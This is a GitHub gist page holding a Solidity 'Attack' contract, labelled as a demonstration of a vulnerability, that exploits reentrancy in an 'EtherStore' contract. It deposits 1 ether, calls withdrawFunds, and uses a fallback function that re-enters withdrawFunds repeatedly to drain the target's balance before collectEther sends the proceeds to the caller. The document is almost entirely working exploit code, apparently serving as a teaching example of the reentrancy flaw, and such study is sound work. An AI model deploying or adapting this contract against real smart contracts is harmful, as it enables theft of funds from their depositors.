Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
DO NOT USE THIS CODE. THIS CODE IS USED TO DEMONSTRATE A VULNERABILITY IN A SOLIDITY CODE.
import "EtherStore.sol";
contract Attack {
EtherStore public etherStore;
// intialise the etherStore variable with the contract address
constructor(address _etherStoreAddress) {
etherStore = EtherStore(_etherStoreAddress);
}
function pwnEtherStore() public payable {
// attack to the nearest ether
require(msg.value >= 1 ether);
// send eth to the depositFunds() function
etherStore.depositFunds.value(1 ether)();
// start the magic
etherStore.withdrawFunds(1 ether);
}
function collectEther() public {
msg.sender.transfer(this.balance);
}
// fallback function - where the magic happens
function () payable {
if (etherStore.balance > 1 ether) {
etherStore.withdrawFunds(1 ether);
}
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment